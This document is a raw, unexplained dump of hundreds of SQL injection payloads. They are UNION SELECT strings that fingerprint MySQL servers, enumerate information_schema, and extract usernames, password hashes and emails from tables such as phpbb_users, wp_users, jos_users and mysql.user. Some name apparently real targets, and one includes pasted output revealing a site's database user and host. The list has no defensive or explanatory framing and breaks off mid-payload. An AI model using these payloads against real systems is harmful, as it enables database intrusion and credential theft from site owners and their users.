1,concat_ws(0x3C62723E,username,user_icq,user_password,user_email),3,4,5,char(0x63,0x72,0x61,0x63,0x6b,0x65,0x64,0x20,0x62,0x79,0x20,0x66,0x6f,0x62,0x6f,0x66,0x6f,0x62,0x20,0xa9,0x20,0x28,0x41,0x6e,0x74,0x69,0x63,0x68,0x61,0x74,0x29),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from utm_users limit 4814,1/* 131 and(1=2) UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/* 131 limit 0 union select 1,group_concat(0x3c62723e,concat_ws(0x2e,table_schema,table_name,column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like 0x2570617325 -131 union select 1,2,3,4,5,6,7,group_concat(0x0b,winusersEmail),9,10,11 from nc_winusers-- -131' union select 1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,0,1,2,3,4,5 from user/* -131 union select 1,2,3,4,convert(concat(user(),char(58),version(),char(58),database()) using latin1),6,7,8 user/* -131 union select 1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,group_concat(0x3a3a,user_name,user_password),9,10,11 from cpg11d_users-- -131 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6-- -131 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/* 131 union select 1,config_name,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from phpbb_config limit 57,1/* -131 union select concat(user(),version()),2,3,4,5,6,7,8/* -1321 union select 1 from users/* 1322 UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10 LIMIT 1,1 -1322 union select 1,2,3,concat_ws(char(58),version(),user(),database()),user,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user/* -13236 union select 1,2,3,4,5,6,login,8,9,password from b_user limit 105,1 -1324892363 union select 1,concat_ws(0x3a,@@version,user(),database()),3 -- -1324' union select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -1326 union select 1,2,database(),version(),5,6,7,8,9,10,user()/* -1328 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6 -132 and 1=2 union select 1,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6,7 -- -132 union all select database(),version()-- -132 union select 1,2,3,4,5 from usuario -- 132 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -132 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables/* -132 union select 1,2,3,concat_ws(char(58,58),mail,pass),5,6,7,8 from user limit 1,1/* -132 union select 1,2,3,version(),user(),6,7,8,9,10 -- -132 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14 -- -132 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9-- -132' union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,31/* -132 union select null,null,null,null,null,null,null,null,null,null,null,null,null,version(),null-- -1331 union select 1,concat_ws(0x3a3a3a,username,password),3,4 from users limit 0,1/* 13333333 union select 1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9,10,11 from NewInTheNews/* -1335 union select 1,2,login,4,passw FROM job_catvip 1337 union select 1,2,3,4,5,6,7,8,9,10,11,12,table_name,14,15,16,17,18,19 from information_schema.tables where table_schema=database() limit 1,1-- -1337 union select 1,2,CONCAT_WS(CHAR(32,58,32),UserGroupID,UserID,FirstName,LastName,UserName,Password,Email,AccessLevelID,Active),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM Users-- 133' and 1=0 union Select 1,2,3,version(),5,6,7,8 -- -133 union select 1,2,3,concat(login,0x3a,password),5,6,7 from users limit 2,10/* -133 union select 1,2,3,concat(user,char(58),password),5,6,7,8,9,0,11,12,13,14 from mysql.user/* -133 union select 1,2,concat(0x3a,version(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -133 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5-- -133 union select 1,user(),3,version(),database(),6,7,8,9/* 133 union select 1,version(),3,4,5 from comics/* -133 union select concat_ws(0x3a3a3a,version(),user(),database()),null,null,4,5,6,null/* -133' union select concat_ws(0x3a,version(),database(),user()),2/* -13420 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,database(),version(),user()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -13424 union select 1,2,3,4,4,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 -- 1344 union select 1,name,3 from VF_admins-- -1347 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,name from login limit 1,1/* -1348 union select 1,2,3,4,5,concat(user(),char(58),version()),7,8,9,10,11/* 134-999.9 union select 1,version(),3,user(),5,6-- 134 and 1=21 union select 1,2,3,concat_ws(0x3b,version(),database(),user()),5,6,7,8,9,10,11,12 -- 134' and substring(version(),1,1)=5# -134 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables -- -134 union select 1,2,3,4,5,user(),7,database(),9,10,11,12,13,14,15/* -134 union select 1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from INFORMATION_SCHEMA.COLUMNS limit 1-- 134 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10 limit 1,1/* -134 union select 1,2,3,version(),database(),user(),7,8,9,10,11/* 134 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8-- -134 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10-- -134 union select 1,group_concat(login,0x3a,password,0x3a,name,0x3a,email,0x3a,admin SEPARATOR 0x3C62723E),3,4 from auth_user-- -134 union select 1,password,3,4,5,6,7,8,9,10,11,12 from mysql.user/* -134 union select 1,password,3,4,5,6,7,8,9,10,11,12 from mysql.user/* -134 union select 1,version(),3,4,5,6,7,8,9-- -1352 UNION SELECT 0,1,concat_Ws(0x0b,user(),version(),database()),3,4 -1353 UNION SELECT 1,2,3,4,concat_Ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -13551 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -1355 union all select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15 -1359 UNION SELECT 1,2,3,4,5,VERSION(),7,8,9,10,11,12,13,GROUP_CONCAT(TABLE_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 FROM INFORMATION_SCHEMA.TABLES -- 135 and 1=2 union select 1,2,version(),4,5,6,7,8,9,10,11,12CurrentUser: smart_dev@localhostSqlVersion: 5.0.45CurrentDB: smartSystemUser: smart_dev@localhostHostName: smartdesignworldwide.comInstallationdir: /usr/DBUser: 'smart_dev'@'%25'DataBases: information_schema smart -135 and 1=2 union select concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2 -- -135 UNION ALL SELECT NULL,NULL,NULL,concat_ws(0x3a,user(),version(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- -135' union select 1,2,3,4,5 -- -135' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat_ws(0x3a3a,LeUser,pass,droits,idMediatheque,Nom,Prenom,Courriel),45,46,47,48,49,50,51,52,53,54 from admin -- -135 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35 from mysql.user/* -135 union select 1,2,3,4,5,6,concat_ws(0x2e,table_schema,table_name,column_name),8,9,10,11,12 from information_schema.columns/* -135 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables -- -135 union select 1,2,3,concat_ws(0x3a3a,user,password),5,6,7 from mysql.user/* -135 union select 1,2,3,user,User(),6,7 from mysql.user/* -135 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -135 union select 1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2F,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35 from mysql.user/* -1364 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a3a,ID,bnbid,pw),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174 from motdepasse -- -1364' union select 1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,id,0x3a,name,0x3a,email,0x3a,password),null,null,8,9,10,11,12,13,14,15,16,17 from users-- -13673 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,version(),45,46,47,48,49,50,51,52,53,54,55-- -13677 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 136780000000 UNION SELECT 0x7468617420617265206675636B2121,2,3/* -13692' union select 1,2,3,concat_ws(0x3a3a,id,level,username,password,email),5,6,7,8,9,10,11,12,13,14,15 from lore_users -- 136-999.9 union select 1,2,version(),4,5,6,7,8,9,10,11-- 1369 and 1=0 union select 1,group_concat(schema_name) from information_schema.schemata -- -1369' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,user(),database()/* 136 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -- -136 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9 -- -136 union select 1,2,3,concat_ws(0x40,user(),database(),version()),5,concat_ws(0x40,name,pass),7,8,9,10,11,12,13,14,15,16,17 from users-- -136 union select 1,2,3,group_concat(AdminName,char(58),AdminPwd,char(58),AdminAdmins),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from Admin -- -136 union select 1,2,concat_ws(0x3a3a,nombre,pass),4,5,6,7,8,9,10,11 from usuarios limit 1,1 -- -136' union select 1,2,concat_ws(0x3a,user(),database(),version())/* -136 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 136' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10/* -13712 union select 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 16,1/* 1371 union select 1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat(U_Username,0x3a,U_Password))),14,15,16,17,18,19,20,21 from w3t_Users limit 89,1 -- -1372 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12-- -1372 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15-- 1373 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11-- -13763 union select 1,concat(version(),char(58),user()),password,id,database(),6,7,8,9,10,11 from users/* -1377 union select concat(username,0x3a,password),2 from users/* -1377 union select concat(username,0x3a,user_password),2 from phpbb_users order by 2,1-- 1378 and 1=0 union select 1,2,3,concat_ws(0x2f,version(),user(),database()),5,6,7,8,9,10,11 -137 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),42,43,44,45,46 -137 union select 1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),12,13,14,15/* -137 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,22,user_login,user_pass),9 from wp_users -- -137 union select 1,2,3,4,5,6,concat(login,char(58),password),8,9 from fs_admin limit 1,11/* -137 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x75736572 -- -137 Union Select 1,2,3,4,5,concat_ws(0x3a3a,ID,Username,Password,Mail,Name,Gender,UserGroup),7 from DejanTomicUsers where UserGroup=20 -- -137 union select 1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10,11,12,13 -137 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -137 union selecT null,null,null,null,concat(login,0x3a,password),null,null,null,null,null,null from users-- 13809 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -13817 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -1385' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167/* 13867' and substring(@@version,1,1)=5-- 1386 aNd 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18 -- -1386 union select 1,2,3,version(),user(),6,7,8,9,10,11 -- 13876876859 union select 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20-- -1387 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8-- -13887 union select 1,2,3,group_concat(concat_ws(0x3a3a,username,password)) from wciom_typo3.fe_users -- -138 /*!UNION*/ SELECT 1,2,3,4,5,6,/*!table_name*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.tables -- -138 union select 1,2,3,4,concat_ws(0x3a3a,username,user_password,user_passchg,user_pass_convert,user_email,user_login_attempts,user_type,group_id,user_permissions,user_perm_from),6 from forum2_users limit 7,1 -- -138 union select 1,2,3,concat_ws(0x3a,login_id,userid,pass),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 from login -- -138 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -138 union select 1,2,DATABASE(),USER(),VERSION(),6,7,8,9/* -138' union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,null,6,7,now() from information_schema.tables-- -138 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8-- -138 union select 1,group_concat(user(),version()),3,4,5,6,7 -- 138 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7-- -1390 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2-- -1391 UNION SELECT 1,2,password,login,5,6,7 from users/* 1392 union select 1,concat(0x3,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/* 1393 union select 1,2,3,4,5,6,version(),database(),user(),10,11,12,13,14,version(),16,17,18,19,20,21,22/* -1393 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -1394 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,29 from information_schema.tables/* -1396 union select 1,2,@@version,4,5 -- 13997987 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT CONCAT(Username,0x3a,Password,0x3a,Email) FROM dicksondata_user.tUser LIMIT 4,1),0x3a),0x71),0x71),4-- 13-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 13-999.9 union select 1,version(),3,4,5,6,7,8-- 139 and 1=2 union all select 1,2,group_concat(username,char(58),password),4,5,6,7,8 from admin-- -139 union select 1-- -139 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -139 union select 1,2,3,4,5,6,concat_ws(version(),0x3a,database(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -139 UNION SELECT 1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from sbauctions_admin/* -139 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11 -139 union select 1,2,version(),4/**/ -139 union select concat_ws(0x3a,id_ag,nameco,nam,passwd) from users-- 13 and 1=0 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,logon,password),11,12,13,14 from users-- 13 and 1=0 union select 1,version(),3,4,5 -- 13 and 1=0 union select concat_ws(0x3a,id,name,pass,email),2 from users limit 3,1 -- 13 and 1=0 union select version(),2-- 13 AND 1=2 UNION SELECT 0,concat(users_name,0x3a,users_pass),2,3,4,5,6,7,8,9 from hemasol_hema.users-- 13 AND 1=2 UNION SELECT 0,null,2,3,4,5,6,7,8,9-- 13 and 1=2 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),8,9,10,11,12,13 13 and 5=@@version-- 13 and sleep(3)# 13) and substring(version(),1,1)=4# -13 union all select 1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),7,8 -- -13 ' union all select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5-- -13 union ALL select 1,concat_ws(0x3a,version(),database(),user()),3,4,5-- -13 union select 0,1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),9,10,11,12,13,14-- 13' union select 0,1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15/* -13' UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7 -- -13 union select 1,2,3,4,5,6,7,8,9,0,1,2 -- -13' union select 1,2,3,4,5,6,7,8,9,10,11,12 /* -13 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()) -13 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 -- 13 union select 1,2,3,4,5,6,7,8 from MSysAccessXML 13 union select 1,2,3,4,5,6,7,8,version(),0/* -13 union select 1,2,3,4,5,6,7,8,@@version,0,11/* -13 union select 1,2,3,4,5,6,7 from ds_e30club_page/* -13 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -13 union select 1,2,3,4,5,6,cast(version() as binary),8,9,10,11,12,13/* -13 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database())/* -13 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -13 union select 1,2,3,4,5,concat_ws(0x3a3a,login,password),7 from user /* -13 union select 1,2,3,4,5 from users/* -13 UNION SELECT 1,2,3,4,5,password,7,8,9,10,11,12 from users/* -13 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7 -- 13 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10,11 LIMIT 1,1/* -13 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from hotelpearl_users/* -13 union select 1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9-- -13 union select 1,2,3,4,concat_ws(0x3a,name,pwd,salt),6,7,8,9,0,11 from user-- -13 union select 1,2,3,4,concat_ws(0x3a,user,password,host),6 from mysql.user/* -13' union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,0,11,12,13,14,15,16 -- 13 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13/* -13 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -13 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()) from information_schema.columns-- -13 union select 1,2,3,4,convert(concat_ws(0x3a,version(),database(),user()) using latin1),6,7,8,9,10/* -13 union select 1,2,3,4,group_concat(concat_ws(0x3a,username,password) separator 0x0a),6,7,8,9,10 from users/* 13' union select 1,2,3,4 limit 1,1/* -13 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13 13 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT CONCAT(user,0x3a,password) FROM henhouse.admin LIMIT 1,1),0x3a),0x71),0x71),5,6,7,8,9,10-- -13 union select 1,2,3,concat(username,0x3a,password),5,6,7,8 from usr limit 0,1/* -13 union select 1,2,3,concat(version(),0x2F,database(),0x2F,user()),5/* -13 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12-- -13 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14-- -13 union select 1,2,3,convert(concat(user(),0x3a,version(),0x3a,database()) using latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from news/* -13 union select 1,2,3,convert(concat(username,0x3a,password),binary),5 from cht_reg_users limit 0,1/* 13 UNION SELECT 1,2,3,convert(concat_ws(0x3A3a,user_login,user_pass) using latin1),5 from msgs_users/* -13 union select 1,2,3,table_name,5,6,7 from information_schema.tables limit 2,1/* -13 union select 1,2,3,unhex(hex(concat_ws(0x3a,name,member_login_key))),5,6 from ibf_members limit 0,1 -13 union select 1,2,3,version(),user(),6,database(),8,9,10,11,12/* -13 union select 1,2,concat(table_name,char(58),column_name,char(58),table_schema),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.columns limit 0,1/* -13 union select 1,2,concat(username,0x3a,password),4,5,6,7 from phpauthent_users -13 union select 1,2,concat(user_name,0x3a,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from kr_user limit 1,1 13' union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7/* -13 union select 1,2,concat_ws(0x3a3a3a,uid,passwd),4 from users limit 0,1 -- -13 union select 1,2,concat_ws(0x3a3a,email,password),4,5,6,7,8,9,10,11 from users -- -13 union select 1,2,concat_ws(0x3a3a,email,username,password),4,5,6,7 from flovers_configuration -- -13' union select 1,2,concat_ws(0x3a3a,id,email,pass,creation,societe,nom,prenom,rcs,tel,categorie,admin,reponse,inactif),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from membre -- -13 union select 1,2,concat_ws(0x3a3a,login_user,password_user),4,5,6 from user-- -13 union select 1,2,concat_ws(0x3a,user_id,username,user_password,user_email) from phpbb_users limit 1,1/* 13 union select 1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10 from phpbb_users where user_id=56-- -13 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,7,0,1,2-- -13 union select 1,2,concat_ws(0x3a,version(),user(),database()),4-- -13 union select 1,2,concat_ws(char(58,58),version(),database(),user()),4,5,6,7,8/* -13 union select 1,2,unhex(hex(table_name)),4,5,6 from information_schema.tables/* -13 union select 1,2,user(),4,5,6,7,8,9,0,1,2-- 13 union select 1,2,user(),4,version(),6 -13 union select 1,2,@@version,4,5,6 -- 13 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14 -13 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3/* -13 union select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where column_name like 0x257061737325 limit 0,1/* -13' union select 1,concat(user(),0x3a,database(),0x3a,version()),3/* -13 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13 from users limit 0,1 13 UNION SELECT 1,concat(user_icq,0x3a,user_password),3,4,5 from forum_users where user_icq <> 0/* 13 union select 1,concat(version(),0x3a,user()),3,4,5 -13 union select 1,concat(version(),0x3a,user()),3,4,5,6 13 union select 1,concat(version(),0x3a,user()),3,4,5,6,7,8/* -13 union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6 13 union select 1,concat_ws(0x2F,version(),user(),database()),concat_ws(0x2F,login,password,id),4,5 from users/* -13 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -13 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7 from jos_users -- -13 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7 -13 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -13 union select 1,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),3,4,5,6,7,8,9,0,1,2-- -13 UNION SELECT 1,CONCAT_WS(0x3a,Version(),Database(),User()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -13 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 -- -13 union select 1,concat_ws(char(58),version(),user(),database()),3,4 from users/* -13 union select 1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1)/* -13' union select 1,group_concat(0x3a,table_name),3,concat_ws(0x3a,database(),user(),version()),5 from information_schema.tables -- -13 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables-- 13 union select 1,id,login from users/* -13 union select 1,mail,3,4,5,6,7,8,9,10,11,12,13 from users -13 union select 1,pass,3 from usuarios -- -13 UNION SELECT 1,password,username,4,5,6,7,8,9,10,11,12,13,14,15 from admin/* -13 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables limit 16,1/* -13 union select 1,table_name,3 from INFORMATION_SCHEMA.TABLES -13 union select 1,unhex(hex(concat_ws(0x3a,version(),user(),databas -13 union select 1,unhex(hex(version())),3,4,5,6/* -13 union select 1,unhex(hex(version())),3,4,5,6,7,8,9-- -13 union select 1,username,user_password,user_email,5,6,7,8,9,10 from drupal_DEV.bb_users limit 0,1/* -13' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14/* -13 union select 1,VERSION(),3,4,5,6,7,8,9,10,11,12 from partners/* -13 union select 